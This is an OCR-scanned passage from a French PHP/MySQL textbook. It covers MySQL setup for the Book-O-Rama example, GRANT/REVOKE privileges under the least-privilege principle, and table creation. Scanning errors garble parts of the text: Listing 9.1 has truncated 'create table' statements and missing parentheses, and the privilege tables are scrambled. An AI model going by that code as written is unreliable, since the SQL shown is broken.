Rama ecrits par Laura Thomson et etre envoy ee a partir d'un formulaire HTML. La 
page de recherche des resultats est appelee resultats.php. 

2. Le serveur web recoit une requete pour resultats.php, recupere le fichier et le passe 
au moteur PHP afin qu'il soit traite. 

3. Le moteur PHP commence a analyser le script. Dans celui-ci se trouve une commande 
permettant de se connecter a la base de donnees et d'executer une requete (pour 
rechercher les livres). PHP ouvre une connexion vers le serveur MySQL et transmet 
la requete appropriee. 

4. Le serveur MySQL recoit la requete de base de donnees et la traite, puis renvoie les 
resultats (c'est-a-dire une liste de livres) au moteur PHP. 

5. Le moteur PHP termine l'execution du script, ce qui consiste generalement a forma- 
ter les resultats de la requete en HTML. II envoie ensuite le fichier HTML obtenu au 
serveur web. 

6. Le serveur web transmet la page HTML au navigateur, pour que l'utilisateur puisse 
voir la liste des livres qu'il a demandes. 

Ce processus reste relativement identique, quels que soient le moteur de scripts et le serveur 
de bases de donnees que vous utilisez. Le plus souvent, le serveur web, le moteur PHP 
et le serveur de bases de donnees tournent tous sur le meme ordinateur. Cependant, il 
arrive que le serveur de bases de donnees se trouve sur un autre ordinateur. Cette 
derniere approche repond a des problemes de securite, d' augmentation des capacites 
et de repartition de la charge. Au niveau du developpement, cela ne change pas 
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grand-chose, bien que cette approche fournisse des avantages significatifs en terme de 
performances. 

A mesure qu'augmenteront la taille et la complexite de vos applications, vous commen- 
cerez a les diviser en niveaux, ou couches. C'est ce que Ton appelle une architecture 
trois tiers car l'application est alors formee d'une couche de base de donnees qui se 
charge de l'interfacage avec MySQL, d'une couche metier qui contient le systeme 
central de l'application et d'une couche de presentation qui gere la sortie HTML. 
L architecture elementaire presentee a la Figure 8.9 vaut cependant toujours : vous 
ajoutez simplement d'autres elements de structure a la section PHP. 

Pour aller plus loin 

Dans ce chapitre, nous avons presente quelques conseils generaux pour 1' architecture 
des bases de donnees relationnelles. Si vous souhaitez vous attaquer plus profondement 
a la theorie des SGBR, vous pouvez consulter plusieurs livres ecrits par des auteurs 
faisant reference en la matiere, comme C. J. Date. Cependant, vous devez savoir que ces 
livres sont tres theoriques et n'ont pas necessairement d'interet immediat pour un deve- 
loppeur web. Generalement, les bases de donnees web classiques ne sont pas tres 
compliquees. 

Pour la suite 

Au prochain chapitre, nous nous interesserons a la construction d'une base de donnees 
MySQL. Nous commencerons par voir comment configurer une base de donnees MySQL 
pour le Web, comment effectuer des requetes dans cette base de donnees et comment 
l'interroger a partir de PHP. 
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Creation d'une base 
de donnees web 

Dans ce chapitre, nous verrons comment configurer une base de donnees MySQL pour 
pouvoir l'utiliser sur un site web. 

Nous reprendrons l'exemple de la librairie virtuelle Book-O-Rama, presentee au chapi- 
tre precedent et dont nous rappelons ici le schema : 

Clients ( IDClient , Nom, Adresse, Ville) 
Commandes ( IDCommande , IDClient, Montant, Date) 
Livres ( ISBN , Auteur, Titre, Prix) 
Livres Commandes dDCommande , ISBN , Quantite) 
Comment aires_Liv res ( ISBN , Comment aire) 

N'oubliez pas que les cles primaires sont soulignees et que les cles etrangeres sont en 
italique. 

Pour pouvoir tirer profit des elements de cette section, vous devez avoir acces a 
MySQL. Cela signifie normalement que : 

1. Vous avez effectue 1' installation de base de MySQL sur votre serveur web. Pour 
cela, il faut notamment : 

- installer les fichiers ; 

- creer un utilisateur sous le nom duquel MySQL sera execute ; 

- configurer votre chemin d'acces ; 

- executer mysql install db, si necessaire ; 

- definir le mot de passe root de MySQL ; 

- supprimer l'utilisateur anonymous et la base de donnees test ; 

- demarrer le serveur MySQL pour la premiere fois et le configurer pour qu'il se lance 
automatiquement. 
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Si vous avez bien fait tout cela, vous pouvez commencer a lire ce chapitre. Dans le 
cas contraire, vous trouverez a l'Annexe A des instructions qui vous aideront. 

Si, a n'importe quel moment dans ce chapitre, vous avez des problemes, ce peut etre 
du a la configuration de votre systeme MySQL. Dans ce cas, verifiez a nouveau 
cette liste et consultez l'Annexe A pour vous assurer que votre configuration est 
correcte. 

2. Vous devriez egalement avoir acces a MySQL sur un ordinateur dont vous n'etes 
pas l'administrateur, comme un service d'hebergement web, un ordinateur de votre 
societe, etc. 

Dans ce cas, pour que vous puissiez utiliser les exemples ou creer votre propre base 
de donnees, votre administrateur doit configurer un utilisateur et une base de 
donnees et vous fournir le nom d'utilisateur, le mot de passe et le nom de la base de 
donnees qu'il vous a affectes. 

Vous pouvez choisir de sauter les sections de ce chapitre qui expliquent comment 
configurer les utilisateurs et les bases de donnees, ou les lire pour expliquer plus 
precisement a votre administrateur ce dont vous avez besoin. En tant qu' utilisateur 
normal, vous n'avez pas le droit d'executer les commandes permettant de creer des 
utilisateurs et des bases de donnees. 

Tous les exemples de ce chapitre ont ete developpes et testes avec la derniere version de 
MySQL 5. Certaines versions anterieures de MySQL possedent moins de fonctionnali- 
tes : il est done preferable d'installer la version stable la plus recente lorsque vous confi- 
gurez votre systeme. Vous pouvez charger la derniere version sur le site de MySQL, 
http://mysql.com. 

Dans ce livre, nous interagirons avec MySQL au moyen d'un client en ligne de 
commande, le moniteur MySQL fourni avec chaque installation de MySQL, mais vous 
pouvez utiliser d'autres clients. Par exemple, si vous utilisez MySQL dans un environ- 
nement web, les administrateurs systeme proposent souvent l'interface phpMy Admin 
que vous pouvez utiliser dans votre navigateur. Les differents clients graphiques propo- 
sent evidemment des procedures legerement differentes de celles decrites ici, mais vous 
devriez pouvoir adapter les instructions fournies assez facilement. 

Note sur I'utilisation du moniteur MySQL 

Dans les exemples MySQL de ce chapitre et du chapitre suivant, vous remarquerez 
que toutes les commandes se terminent par un point-virgule (;). Celui-ci demande 
a MySQL d'executer les commandes. Si vous oubliez ce point-virgule, il ne se 
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passera rien du tout. II s'agit d'un probleme tres frequent chez les nouveaux utilisa- 
teurs. 

Cela signifie egalement que vous pouvez inserer des retours a la ligne au milieu d'une 
commande. Nous nous sommes d'ailleurs servis de cette caracteristique pour ameliorer 
la lisibilite de nos exemples. Cette situation se remarque facilement puisque MySQL 
affiche un symbole indiquant qu'il attend la suite de la commande. II s'agit d'une petite 
fleche qui ressemble a ceci : 

mysql> grant select 

-> 

Vous obtiendrez cette invite jusqu'a ce que vous saisissiez un point-virgule, a chaque 
fois que vous appuyez sur la touche Entree. 

Un autre point important est que les instructions SQL ne tiennent pas compte de la 
difference majuscules/minuscules, mais ce n'est pas forcement le cas pour les noms des 
bases de donnees et des tables. Nous reviendrons sur ce point un peu plus loin. 

Comment ouvrir une session MySQL 

Pour demarrer une session MySQL, lancez un interpreteur de commandes sur votre 
ordinateur et saisissez la ligne suivante : 

> mysql -h hote -u utilisateur -p 

La commande mysql lance le moniteur MySQL. II s'agit d'un client en ligne de 
commande qui vous connecte au serveur MySQL. 

L'option h sert a indiquer l'hote auquel vous souhaitez vous connecter, c'est-a-dire 
l'ordinateur sur lequel le serveur MySQL s'execute. Si vous lancez cette commande sur 
le meme ordinateur que le serveur MySQL, vous pouvez ignorer cette option, ainsi que 
le parametre hote. Dans le cas contraire, il faut remplacer le parametre hote par le nom 
de l'ordinateur sur lequel le serveur MySQL s'execute. 

L'option u sert a indiquer le nom de l'utilisateur sous lequel vous souhaitez vous 
connecter. Si vous n'en specifiez aucun, le client choisira par defaut le nom de l'utili- 
sateur sous lequel vous avez ouvert une session dans le systeme d' exploitation. 

Si vous avez installe MySQL sur votre propre ordinateur ou sur votre serveur, vous 
devez ouvrir une session sous le compte root et creer la base de donnees que nous utili- 
serons dans cette section. Si vous venez d'installer MySQL, root est le seul utilisateur 
qui existe et vous devez done vous connecter sous son compte. Si vous utilisez MySQL 
sur un ordinateur administre par quelqu'un d' autre, servez-vous du nom d' utilisateur 
que Ton vous a fourni. 
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L' option p indique au serveur que vous souhaitez vous connecter en utilisant un mot de 
passe. Vous n'avez pas besoin de la specifier si aucun mot de passe n'a ete defini pour 
l'utilisateur sous lequel vous voulez ouvrir une session. 

Si vous avez ouvert votre session sous le nom root et qu'aucun mot de passe n'a ete 
defini pour root, nous vous recommandons fortement de consulter sans tarder 
l'Annexe A et de le definir tout de suite. Sans mot de passe root, votre systeme n'est 
pas du tout securise. 

Vous n'avez pas besoin de donner le mot de passe sur cette ligne, puisque le serveur 
MySQL vous le demandera. En fait, il vaut mieux ne pas le donner car, si vous le saisis- 
sez sur la ligne de commande, il apparaitra clairement a l'ecran et pourra done etre 
intercepts tres facilement. 

Apres avoir saisi la commande precedente, vous devriez obtenir une reponse comme 
celle-ci : 

Enter password: 

Si vous n'obtenez pas cette ligne, verifiez que le serveur MySQL fonctionne correcte- 
ment et que la commande mysql se trouve dans votre PATH. 

II faut ensuite saisir votre mot de passe. Si tout se passe bien, vous devriez ensuite obte- 
nir une reponse ressemblant a ceci : 

Welcome to the MySQL monitor. Commands end with ; or \g. 

Your MySQL connection id is 1 to server version: 5 . . 0-alpha-max-debug 

Type 'help;' or '\h' for help. Type '\c' to clear the buffer. 

mysql> 

Si vous n'obtenez pas une reponse similaire avec une installation sur votre propre 
machine, assurez-vous que vous avez bien execute mysql install db, que vous avez 
defini le mot de passe root et que vous l'avez saisi correctement. Si vous n'etes pas 
responsable de 1' installation de MySQL, assurez-vous que vous avez saisi le mot de 
passe correctement. 

Vous devriez maintenant obtenir l'invite de commande de MySQL et etre pret a creer la 
base de donnees. 

Si vous utilisez votre propre ordinateur, suivez les indications de la section suivante. 

Si vous utilisez l'ordinateur de quelqu'un d'autre, la base de donnees devrait deja etre 
creee. Vous pouvez alors passer directement a la section "Utiliser la bonne base de 
donnees" ou lire les sections qui suivent a titre d' informations generales, mais vous ne 
serez pas capable d'executer les commandes indiquees dans ces sections ou, tout du 
moins, vous ne devriez pas etre autorise a le faire ! 
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Creation des bases de donnees et des utilisateurs 

Le systeme de base de donnees MySQL peut gerer de nombreuses bases de donnees. 
Generalement, il existe une base de donnees par application. Dans notre exemple de la 
librairie Book-O-Rama, la base de donnees s'appellera livres. 

La creation de la base de donnees est la partie la plus simple. Sur la ligne de commande 
de MySQL, saisissez la commande suivante : 

mysql> create database livres; 

C'est tout. Vous devriez obtenir une reponse comme celle-ci (au temps d'execution pres) : 

Query OK, 1 row affected (0.06 sec) 

Cette reponse signifie que tout s'est bien passe. Si vous obtenez une autre reponse, 
assurez-vous que vous n'avez pas oublie de saisir le point-virgule a la fin de la ligne. Un 
point-virgule indique a MySQL que vous avez termine de saisir votre commande et 
qu'il doit l'executer. 

Configuration des utilisateurs et des privileges 

Un systeme MySQL peut compter plusieurs utilisateurs. Pour des raisons de securite, 
l'utilisateur root ne devrait servir qu'aux taches d' administration. Vous devez definir 
un nom et un mot de passe pour chaque utilisateur devant avoir acces a MySQL. Ces 
noms d'utilisateurs ne correspondent pas forcement aux noms d'utilisateurs ou aux 
mots de passe existant en dehors de MySQL (les noms d'utilisateurs et les mots de 
passe Unix ou Windows, par exemple). Ce principe est egalement valable pour le 
compte root. II est generalement conseille de choisir un mot de passe different pour les 
comptes du systeme et pour les comptes de MySQL, en particulier pour le compte root. 

Bien qu'il ne soit pas obligatoire de creer des mots de passe pour les utilisateurs, nous 
vous conseillons fortement de choisir un mot de passe pour tous les utilisateurs que 
vous creez. Dans le cadre de la configuration d'une base de donnees web, il est genera- 
lement interessant de creer au moins un utilisateur par application web. Vous pouvez 
vous demander pourquoi ; la reponse se trouve dans les privileges. 

Introduction au systeme de privileges de MySQL 

L'une des caracteristiques les plus interessantes de MySQL est qu'il dispose d'un 
systeme de privileges evolue. Un privilege est le droit d'effectuer une action particu- 
liere sur un objet specifique, sous un compte utilisateur donne. Ce concept ressemble 
beaucoup aux droits d' acces des fichiers. 

Lorsque vous creez un utilisateur dans MySQL, vous lui accordez un ensemble de 
privileges pour indiquer ce qu'il peut faire et ne peut pas faire dans le systeme. 
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Principe des privileges minimaux 

Ce principe permet d'ameliorer la securite de n'importe quel systeme informatique. II 
s'agit d'un principe a la fois tres simple et tres important, que Ton oublie un peu trop 
souvent et qui peut se resumer de la maniere suivante : 

Un utilisateur (ou un processus) doit posseder le niveau de privilege le plus bas 
possible pour pouvoir effectuer correctement sa tache. 

Ce principe s'applique egalement a MySQL. Pour, par exemple, executer des requetes 
a partir du Web, un utilisateur n'a pas besoin de posseder tous les privileges auxquels 
root a acces. II convient par consequent de creer un autre utilisateur qui possede 
uniquement les privileges necessaries pour acceder a la base de donnees que vous venez 
de creer. 

Configuration des utilisateurs : la commande GRANT 

Les commandes GRANT et REVOKE servent a accorder ou a retirer des droits d'acces aux 
utilisateurs de MySQL, selon quatre niveaux de privileges : 

■ global ; 

■ base de donnees ; 

■ table ; 

■ colonne. 

Nous verrons bientot comment les utiliser. 

La commande GRANT cree des utilisateurs et leur octroie des privileges. Voici son format 
general : 

GRANT privileges [colonnes] 
ON element 

TO nom_utilisateur [IDENTIFIED BY 'mot de passe'] 

[REQUIRE options ssl] 

[WITH GRANT OPTION | limites ] ] 

Les clauses entre crochets sont facultatives. Cette syntaxe comprend plusieurs parametres 
en italique que nous allons passer en revue. 

Le premier, privileges, est une liste de privileges separes par des virgules. Ces privi- 
leges doivent etre choisis dans une liste predefinie de MySQL, que nous presenterons 
dans la prochaine section. 
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Le parametre colonnes est facultatif. Vous pouvez l'utiliser pour preciser les privileges 
associes a certaines colonnes. II peut correspondre au nom d'une seule colonne ou a une 
liste de noms de colonnes separes par des virgules. 

Le parametre element correspond a la base de donnees ou a la table a laquelle s'appli- 
quent les privileges. 

Vous pouvez octroyer des privileges sur toutes les bases de donnees en indiquant * . * a la 
place de element. On accorde alors des privileges globaux. Vous pouvez aussi indiquer * si 
vous n'utilisez aucune base de donnees particuliere. 

Le plus souvent, vous designerez toutes les tables d'une base de donnees avec 
nom base. *, une table particuliere avec nom base. nom table, ou des colonnes specifi- 
ques avec nom base . nom table et les colonnes en question a la place de colonnes. Ces 
trois approches represented respectivement les trois autres niveaux de privileges dispo- 
nibles : sur une base de donnees, une table et une colonne. Si vous utilisez une base de 
donnees specifique lorsque vous executez cette commande, nom table sera interprete 
comme une table de la base de donnees courante. 

nom utilisateur doit correspondre au nom de l'utilisateur sous lequel vous souhai- 
tez ouvrir une session dans MySQL. N'oubliez pas que ce nom ne doit pas forcement 
correspondre a votre nom d'utilisateur sur votre systeme d' exploitation. Avec 
MySQL, nom utilisateur peut egalement correspondre a un nom d'hote. Vous 
pouvez utiliser cette particularite pour differencier, par exemple, laura (qui sera 
interprete comme laura@localhost) et laura@autre part.com. Cette particularite 
est tres interessante puisqu'il arrive souvent que des utilisateurs de differents domai- 
nes aient le meme nom en local. En outre, cette caracteristique ameliore la securite du 
systeme, puisque vous pouvez specifier l'endroit a partir duquel les utilisateurs se 
connectent, et meme les tables et les bases de donnees auxquelles ils ont acces a partir 
d'un emplacement particulier. 

mot de passe designe le mot de passe que vous avez choisi pour l'utilisateur indique. 
Les regies generales pour choisir les mots de passe doivent toujours etre respectees. 
Nous reviendrons un peu plus loin sur les problemes de securite, mais, d'une maniere 
generale, un mot de passe ne doit pas pouvoir etre devine facilement. Cela signifie qu'il 
ne doit figurer dans aucun dictionnaire et qu'il doit etre different du nom de l'utilisa- 
teur. Idealement, il doit contenir des lettres majuscules, des lettres minuscules et des 
carac teres non alphabetiques. 

La clause REQUIRE vous permet de preciser que l'utilisateur doit se connecter via SSL 
(Secure Sockets Layer) et d'indiquer d'autres options SSL. Pour plus d' informations 
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concernant les connexions SSL a MySQL, reportez-vous au manuel MySQL. L' option 
WITH GRANT OPTION, lorsqu'elle est indiquee, permet a l'utilisateur selectionne de 
transmettre ses privileges a d'autres utilisateurs. 

A la place de WITH GRANT OPTION, vous pouvez egalement utiliser les limites suivantes : 
MAX_QUERIES_PER_HOUR n 

0L1 

MAX_UPDATES_PER_HOUR n 

0L1 

MAX_CONNECTIONS_PER_HOUR n 

Ces clauses vous permettent de limiter le nombre de requetes, de mises a jour ou de 
connexions par heure qu'un utilisateur est autorise a effectuer. Elles peuvent etre 
utiles lorsqu'il importe de limiter la charge des utilisateurs individuels sur des systemes 
partages. 

Les privileges sont enregistres dans cinq tables systeme appartenant a la base de 
donnees mysql. Ces cinq tables s'appellent mysql.user, mysql.db, mysql.host, 
mysql . tables priv et mysql . columns priv et correspondent directement aux 
niveaux de privileges que nous avons deja mentionnes. Si vous ne souhaitez pas 
passer par GRANT, vous pouvez modifier directement ces tables. Nous y reviendrons 
en detail au Chapitre 12. 

Types et niveaux des privileges 

II existe trois principaux types de privileges dans MySQL : les privileges des utilisa- 
teurs classiques, les privileges des administrateurs et deux privileges particuliers. 
N'importe quel utilisateur peut obtenir ces privileges, mais il est generalement prefera- 
ble de reserver les privileges d' administration aux administrateurs, conformement au 
principe des privileges minimaux. 

Les privileges ne devraient etre octroyes aux utilisateurs que pour les bases de 
donnees et les tables qu'ils ont besoin d'utiliser. La base de donnees mysql ne doit 
etre accessible qu'aux administrateurs car elle stocke les informations sur les utilisa- 
teurs, les mots de passe, etc. (nous reviendrons sur cette base de donnees au Chapi- 
tre 12). 

Les privileges des utilisateurs normaux sont directement associes a des types specifi- 
ques de commandes SQL et indiquent si un utilisateur a le droit d'executer ces 
commandes. Nous reviendrons sur ces commandes SQL au chapitre suivant. Pour 
l'instant, nous etudierons une description conceptuelle de leurs actions. Les privileges 
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d'un utilisateur normal sont presentes dans le Tableau 9.1. La deuxieme colonne indique 
les objets auxquels chaque privilege peut etre applique. 



Tableau 9.1 : Privileges des utilisateurs normaux 



Privilege Applicable a Description 

SELECT Tables, colonnes Permet aux utilisateurs de selectionner des lignes (des 

enregistrements) dans des tables. 

Permet aux utilisateurs d'inserer de nouvelles lignes dans des 
tables. 

Permet aux utilisateurs de modifier les valeurs existantes dans 
les lignes des tables. 

Permet aux utilisateurs de supprimer des lignes existantes dans 
des tables. 

INDEX Tables Permet aux utilisateurs de creer et de supprimer des index dans 

des tables. 

ALTER Tables Permet aux utilisateurs de modifier la structure de tables 

existantes, par exemple en ajoutant des colonnes, en renommant 
des colonnes ou des tables ou en modifiant le type des donnees 
de certaines colonnes. 

CREATE Bases de donnees, Permet aux utilisateurs de creer de nouvelles bases de donnees 



INSERT Tables, colonnes 



UPDATE Tables, colonnes 



DELETE Tables 



tables ou de nouvelles tables. Si une table ou une base de donnees 

particulieres sont indiquees dans la commande GRANT, le 
privilege CREATE est limite a la base de donnees ou a la table 
indiquee, ce qui signifie qu'il faudra au prealable la supprimer 
(avec DROP). 

DROP Bases de donnees, Permet aux utilisateurs de supprimer des bases de donnees ou 



tables 



des tables. 



La plupart des privileges des utilisateurs normaux sont relativement inoffensifs en 
termes de securite. Le privilege ALTER peut permettre de contourner les privileges 
systeme en renommant des tables, mais les utilisateurs en ont souvent besoin. La secu- 
rite est toujours un compromis entre la surete et la simplicite d'utilisation. Vous devrez 
done prendre vos propres decisions quant a ALTER, mais il faut savoir que ce privilege 
est souvent accorde aux utilisateurs normaux. 

Outre ceux du Tableau 9.1, les privileges appeles REFERENCES et EXECUTE existent mais 
ne sont pas encore utilises et le privilege GRANT n'est octroye que par la clause WITH 
GRANT OPTION ; il ne peut pas apparaitre dans la liste privileges. 
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Le Tableau 9.2 presente les privileges reserves aux administrateurs. 



Tableau 9.2 : Privileges des administrateurs 

Privilege Description 



CREATE TEMPORARY TABLES 
FILE 

LOCK TABLES 
PROCESS 

RELOAD 

REPLICATION CLIENT 

REPLICATION SLAVE 
SHOW DATABASES 



SHUTDOWN 
SUPERT 



Permet a un administrateur d'utiliser le mot-cle TEMPORARY 
dans une instruction CREATE TABLE. 

Autorise les donnees a etre lues dans des tables depuis des 
fichiers et vice versa. 

Autorise l'utilisation explicite d'une instruction LOCK TABLES. 

Permet a un administrateur de visualiser les processus serveur 
qui appartiennent a tous les utilisateurs. 

Permet a un administrateur de recharger les tables de 
privileges et de reinitialiser les privileges, les hotes, les 
journaux et les tables. 

Autorise l'utilisation de SHOW STATUS sur les maitres et les 
esclaves de replication. La replication est traitee au 
Chapitre 12. 

Autorise les serveurs esclaves de replication a se connecter au 
serveur maitre. La replication est traitee au Chapitre 12. 

Autorise la consultation de la liste de toutes les bases de 
donnees avec une instruction SHOW DATABASES. Sans ce 
privilege, les utilisateurs ne voient que les bases de donnees 
pour lesquelles ils possedent d'autres privileges. 

Autorise un administrateur a arreter le serveur MySQL. 

Autorise un administrateur a tuer des threads appartenant a 
n'importe quel utilisateur. 



Vous pouvez attribuer ces privileges a des utilisateurs normaux, mais nous vous 
conseillons de ne le faire qu'apres avoir tres soigneusement estime toutes les conse- 
quences. 

Le cas est un peu different pour le privilege FILE car il peut etre interessant pour les 
utilisateurs puisqu'il permet de charger des donnees a partir de simples fichiers, ce qui 
peut leur faire gagner beaucoup de temps en leur evitant d' avoir a saisir leurs donnees 
dans leurs bases. Cependant, le mecanisme de chargement de fichiers peut servir a 
charger n'importe quel fichier visible par le serveur MySQL, y compris des bases de 
donnees appartenant a d'autres utilisateurs et, eventuellement, des fichiers de mots 
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de passe. Ce privilege ne doit done etre accorde qu'avec beaucoup de precautions et 
vous pouvez preferer charger les donnees des utilisateurs a leur place. 

II existe egalement deux privileges particuliers, presentes dans le Tableau 9.3. 

Tableau 9.3 : Privileges particuliers 

Privilege Description 

ALL Accorde tous les privileges presentes dans les Tableaux 9. 1 et 9.2. Vous pouvez 

egalement ecrire ALL PRIVILEGES a la place de ALL. 

USAGE N'accorde aucun privilege. Cela permet de creer un utilisateur et de ne l'autoriser 
qu'a ouvrir une session, sans pouvoir faire autre chose. Generalement, il s'agit 
simplement d'une premiere etape avant d'ajouter d'autres privileges. 



La commande REVOKE 

L'inverse de GRANT s'appelle REVOKE. Cette commande supprime des privileges aux 
utilisateurs. Sa syntaxe ressemble beaucoup a celle de GRANT : 

REVOKE privileges [(colonnes)] 
ON element 

FROM nom_utilisateur 

Si vous avez octroye le privilege GRANT avec la clause WITH GRANT OPTION, vous pouvez 
le supprimer de cette facon (avec tous les autres privileges) : 

REVOKE All PRIVILEGES, GRANT 
FROM nom_utilisateur 

Exemples d'utilisation de GRANT et de REVOKE 

Pour configurer le compte d'un administrateur, vous pouvez saisir la commande 
suivante : 

mysql> grant all 
-> on * 

-> to fred identified by 'mnb123' 
-> with grant option; 

Cette commande accorde tous les privileges sur toutes les bases de donnees a un utilisateur 
appele fred, avec le mot de passe mnbl 23, et l'autorise a transmettre ces privileges. 

Si vous vous ravisez et que vous ne vouliez pas de cet utilisateur dans votre systeme, 
vous pouvez le supprimer avec la commande suivante : 

mysql> revoke all privileges, grant 
-> on * 
-> from fred; 
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Voyons maintenant comment configurer le compte d'un utilisateur normal, sans aucun 
privilege : 

mysql> grant usage 
-> on livres.* 

-> to martine identified by ' magic123 ' ; 

Apres avoir discute un peu avec Martine, et apres avoir appris ce qu'elle souhaite reel- 
lement faire, vous pouvez lui fournir les privileges appropries : 

mysql> grant select, insert, update, delete, index, alter, create, drop 
-> on livres.* 
-> to martine; 

Vous remarquerez qu'il n'y a pas besoin de specifier le mot de passe de Martine pour 
effectuer cette operation. 

Si vous vous rendez compte que Martine abuse de ses privileges, vous pouvez les 
reduire : 

mysql> revoke alter, create, drop 
-> on livres.* 
-> from martine; 

Et, pour terminer, lorsqu'elle n'a plus besoin d'utiliser la base de donnees, vous pouvez 
supprimer tous ses droits : 

mysql> revoke all 
-> on livres.* 
-> from martine; 

Configurer un utilisateur pour le Web 

Vous devrez configurer un utilisateur pour que vos scripts PHP puissent se connecter a 
MySQL. Une fois encore, nous pouvons appliquer le principe de privileges minimaux 
pour determiner ce que les scripts doivent pouvoir faire. 

Dans la plupart des cas, il leur suffit de selectionner, d'inserer, de supprimer et de 
mettre a jour des lignes dans des tables, grace a SELECT, INSERT, DELETE et UPDATE. Vous 
pouvez octroyer ces privileges grace a la commande suivante : 

mysql> grant select, insert, delete, update 
-> on livres.* 

-> to bookorama identified by ' bookorama123 ' ; 

Pour des raisons de securite evidentes, vous devez choisir un meilleur mot de passe que 
celui-ci. 

Si vous passez par un service d'hebergement web, vous avez en general acces aux 
autres privileges utilisateur sur une base de donnees que ce service cree pour vous. Les 
services d'hebergement web donnent souvent les memes noms utilisateurs et mots de 
passe pour l'acces en ligne de commande (la definition des tables, etc.) et pour les 
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connexions des scripts web (les requetes sur la base de donnees). Cette pratique est 
juste un peu moins securisee. Vous pouvez configurer un utilisateur avec ce niveau de 
privileges de la maniere suivante : 

mysql> grant select, insert, update, delete, index, alter, create, drop 
-> on livres.* 

-> to bookorama identified by ' bookorama123 ' ; 

Utilisez cette seconde version de l'utilisateur, car vous en aurez besoin dans la 
prochaine section. 

Vous pouvez quitter le moniteur MySQL en tapant la commande quit. Essayez ensuite 
d'ouvrir une nouvelle session sous le nom de votre utilisateur web, afin de verifier que 
tout fonctionne correctement. Si 1' instruction GRANT que vous avez lancee a ete executee 
mais que l'acces vous soit refuse lorsque vous tentez de vous connecter, cela signifie 
generalement que vous n'avez pas supprime les utilisateurs anonymes au cours du 
processus d' installation. Reconnectez-vous en tant que root et consultez 1' Annexe A 
pour plus d' informations concernant la maniere de supprimer les comptes anonymes. 
Vous devriez alors pouvoir vous connecter en tant qu'utilisateur web. 

Utiliser la bonne base de donnees 

Si vous n'avez eu aucun probleme particulier, vous devriez avoir ouvert une session 
sous un compte d'utilisateur MySQL pour tester les exemples de code, soit parce que 
vous venez de configurer cet utilisateur, soit parce que l'administrateur du serveur web 
l'a fait pour vous. 

La premiere chose a faire apres avoir ouvert une session consiste a indiquer la base de 
donnees avec laquelle vous souhaitez travailler. Pour cela, saisissez la commande 
suivante : 

mysql> use nombase; 

ou nom base correspond au nom de votre base de donnees. 

Vous pouvez vous passer de cette commande si vous indiquez directement le nom de la 
base de donnees lorsque vous ouvrez votre session, comme ici : 

mysql -D nom_base -h note -u utilisateur -p 

Dans cet exemple, nous utiliserons la base de donnees livres : 

mysql> use livres; 

Lorsque vous tapez cette commande, MySQL devrait vous repondre par une ligne 
comme celle-ci : 

Database changed 
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Si vous ne selectionnez aucune base de donnees avant de commencer votre travail, 
MySQL affichera un message d'erreur : 

ERROR 1046 (3D000): No Database Selected 

Creation des tables de la base de donnees 

L'etape suivante dans la configuration de la base de donnees consiste a creer les tables. 
Pour cela, vous pouvez vous servir de la commande SQL CREATE TABLE. Voici le format 
general de cette instruction : 

CREATE TABLE nom_table(colonnes) 

— Info 

MySQL propose plusieurs types de tables ou moteurs de stockage, dont certains permettent 
d'effectuer des transactions sures. Nous presenterons ces types de tables au Chapitre 13. 
Pour le moment, toutes les tables de la base de donnees utiliseront le moteur de stockage 
par defaut, MylSAM. 



II faut evidemment remplacer le parametre nom table par le nom de la table que vous 
souhaitez creer et le parametre colonnes par la liste des colonnes de votre table, separees 
par des virgules. 

Chaque colonne possede un nom, suivi d'un type de donnees. 
Voici a nouveau le schema de Book-O-Rama : 

Clients (JJXlient, Nom, Adresse, Ville) 
Commandes ( IDCommande , IDClient, Montant, Date) 
Livres ( ISBN , Auteur, Titre, Prix) 
Livres Commandes( IDCommande , ISBN , Quantite) 
Comment aires_Livres ( ISBN , Comment aire) 

Le Listing 9.1 presente le code SQL permettant de creer ces tables, en supposant que 
vous avez deja cree la base de donnees livres. Vous trouverez ce programme SQL sur 
le site Pearson, dans le fichier chapitreOWbookorama.sql. 

Vous pouvez demander a MySQL d'executer un fichier SQL existant, du site Pearson, 
en saisissant une commande comme celle-ci : 

> mysql -h hote -u bookorama -D livres -p < bookorama. sql 

(N'oubliez pas de remplacer hote par le nom de votre hote.) 

La redirection de 1' entree standard est tres pratique puisqu'elle permet de modifier votre 
programme SQL dans l'editeur de texte de votre choix avant de l'executer. 
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Listing 9.1 : bookorama.sql — Le programme SQL permettant de creer les tables 
de Book-O-Rama 



create table clients 

( idclient int unsigned not null auto_increment primary key, 
nom char(50) not null, 
adresse char(100) not null, 
ville char(30) not null 



reate table commandes 
idcommande int unsigned not null auto_increment primary key, 
idclient int unsigned not null, 
montant float(6,2) , 
date date not null 



reate table livres 

isbn char(13) not null primary key, 
auteur char(50) , 
titre char(100) , 
prix float(4,2) 



reate table livres_commandes 
idcommande int unsigned not null, 
isbn char(13) not null, 
quantite tinyint unsigned, 
primary key (idcommande, isbn) 



reate table commentaires_livres 

isbn char(13) not null primary key, 
commentaire text 



Chaque table cree sa propre instruction CREATE TABLE. Vous remarquerez que nous 
avons cree chaque table de ce schema avec les colonnes que nous avons mises en place 
au chapitre precedent. Le type de donnees de chaque colonne est indique directement 
apres son nom. En outre, certaines colonnes possedent d'autres particularites. 

Signification des autres mots-cles 

NOT NULL signifie que toutes les lignes de la table doivent posseder une valeur associee 
a cet attribut. S'il n'est pas indique, le champ peut etre vide (NULL). 

AUTO INCREMENT est une fonctionnalite particuliere de MySQL que vous pouvez utiliser 
sur des colonnes contenant des nombres entiers. Ce mot-cle signifie que si nous laissons 
ce champ vide lorsque nous inserons de nouvelles lignes dans la table, MySQL genera 
automatiquement une valeur d'identification unique. Cette valeur correspond a la valeur 
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maximale existant dans la colonne, incrementee de 1 . Cette caracteristique ne peut etre 
utilisee qu'une fois dans chaque table. Les colonnes qui specifient AUTO INCREMENT 
doivent etre indexees. 

Le mot-cle PRIMARY KEY, lorsqu'il est indique apres un nom de colonne, indique que 
cette colonne est la cle primaire de la table. Les entrees de cette colonne doivent etre 
uniques. MySQL indexe automatiquement cette colonne. Vous remarquerez que, lors- 
que nous nous en sommes servis avec idclient dans la table clients, nous l'avons 
utilise avec AUTO INCREMENT. L'indexage automatique des cles primaires s'occupe des 
index necessaries pour AUTO INCREMENT. 

PRIMARY KEY ne peut apparaitre qu'une seule fois dans la definition d'une table. La 
clause PRIMARY KEY a la fin de l'instruction commandes livres utilise done une autre 
forme puisque la cle primaire de cette table est formee de deux colonnes pour lesquelles 
nous n'aurions pas eu le droit de repeter PRIMARY KEY. Notons que cette cle de deux 
colonnes cree egalement un index reposant sur les deux colonnes a la fois. 

